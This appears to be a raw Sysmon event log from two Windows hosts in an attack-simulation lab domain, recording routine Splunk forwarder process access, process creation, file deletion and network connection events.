07:55:03.187{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104316Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.187{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B357-615A-ED01-00000000FC01}5296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104315Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.187{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B357-615A-ED01-00000000FC01}5296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104314Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.188{58E9C193-B357-615A-ED01-00000000FC01}5296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104313Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.047{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104312Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.047{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104311Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:03.047{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104335Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:04.703{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=598961718E4B3218BA18143F3C857433,SHA256=3D25C19F511BE33FD94AEBA22A58241725486FBDBAE505484DCD2850A5231D28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104334Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:04.687{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25CD736CB056C74351063EA78AAD2049,SHA256=79CD217953813322BD1CADE7CE273AC63CB768953C5E291A08EB88978D8742B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082186Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:04.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8CA8DD39E8FC0A2327BB9908287922,SHA256=61E8B025F01D609F6FF5CF4A0ECA1AD1405464B58AD22A09B563DB5295E15A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082187Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:05.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F730C8EF1867B6A4AF4460DB060C32C0,SHA256=E2C8C9FE6653D2734C14FDB0709B0B48B25B9426C9C706218F7C3CF347B21EDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104344Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.703{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=958F550B02FEBD9FBD3242722AB53D73,SHA256=066E9D84C2C3BE8F3D28919765BC663738D0901B43E9B00B8C69F2540A0333D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104343Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B359-615A-EF01-00000000FC01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104342Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104341Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104340Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104339Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104338Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B359-615A-EF01-00000000FC01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104337Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B359-615A-EF01-00000000FC01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104336Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.344{58E9C193-B359-615A-EF01-00000000FC01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082189Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:06.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E993F69A206BCED52D205AC3BC21D18,SHA256=E286D2B7D2A861DD22D10F5317DC8660FD7F5038EE374FF4122BA974DBD8396D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104346Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:06.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBAF449D16BB3C0F007C7E130D91089B,SHA256=2A17E98979ED7698A0E385DFB036CCBC21B08D178BB928C7915829790BB746B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082188Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:04.728{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50080-false10.0.1.12-8000- 23542300x8000000000000000104345Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:06.375{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8391E0F856BD6BBD4A255D4A751A646,SHA256=D63234D83B0ED53EBEA699053E055AEB7DFAD6FD9D51FE5E267BC0C761951895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104349Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:07.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E509685CD2DD23FF27EF8D5591E623FB,SHA256=4B08223C99153DBC877F0094605DF86852560565E53BC88A49BAC846DD4650F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082190Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:07.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7963874F34E0976757ECC47E4898E02,SHA256=B3242CCA4D73FD0A13168A6708CDB6A3F9ACFD58056E31105BFE444E2033E9F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104348Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:07.703{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=7C34B221FA0E838548D0D21B519A1B38,SHA256=B4DADA4CCB6E3E2885CC8D135DD9E556FD4376EDAB962C960268E8BCB424BBBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104347Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:05.302{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49591-false10.0.1.12-8000- 23542300x8000000000000000104350Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:08.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62CFBA54FA8176C6138E1D3C4C86DADB,SHA256=52F30D6B12786C3F3F661485B6C42B3BAC8122A405E3F4E955C7AC1F4691D00F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082191Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:08.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A30E17A10D73A536D0FB0AA362709E3,SHA256=99B90EEE5856FB3F58215F2DCED9649C786E95FBA30EA10A0E881D0FE18CAF34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082192Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:09.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3213B396C7EA6A315001391CE1A522,SHA256=946FB9B123E366E19AD180F6926C734161E2D803050A60AABD46A1B3F5819DB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104351Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:09.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DF244442803A75E4732C132397D004,SHA256=99F7AC216EC73939BDDFCBF28386C31D00F4701CE87C1F06011A3793AE9D262A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082193Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:10.660{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1ABB611E5698E22F02D0F58ACF63815,SHA256=CF5E358269702CCF431BC86530F844FF64C86BBE713B82AF60A75265FFAC761A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104352Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:10.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9118AEBE333BC8721B4B519465A4E355,SHA256=15721EA367E8BD735129ADAE2CBB2C5E9D60BEA48D79CF35556ABE4DD30572C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104353Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:11.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4759202915DD5D042D4CEEFD0BEF6B3E,SHA256=412A8332E1E541B8BBCEA4348F9D33F3ADA6BEF6BA4B8E6AF01901C3CACE01CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082194Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:11.675{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D37F479471C3D3CEB940A62C8CD6CE8A,SHA256=DB3B14A8FF9F47E1936A71569A475DE39ED3614B880CB396FA99F31377A8B28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104354Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:12.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC8AACC0C43B4FD61D53C78EB988E8A,SHA256=99A5850AA392D79B1FC1CE5F0EB6D357C3CC764C141FBFA11E299FD231178446,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082196Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:12.675{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3508FA46CBEABE349C046FFDF7ABD62C,SHA256=36104D040E7C70CFF7B185E0E6EC6BBFE57AAD1E05579AF0642E503706246B5A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082195Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:10.697{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50081-false10.0.1.12-8000- 23542300x800000000000000082197Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:13.691{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F53D9BD6DEE33E55CC051683E01DFB,SHA256=4D56149B00886E2A3DDD75196160AA3004E4D08035DEDD4D4CF3170C9BF0A8EA,IMPHASH=00000000000000000000000000000000falsetrue 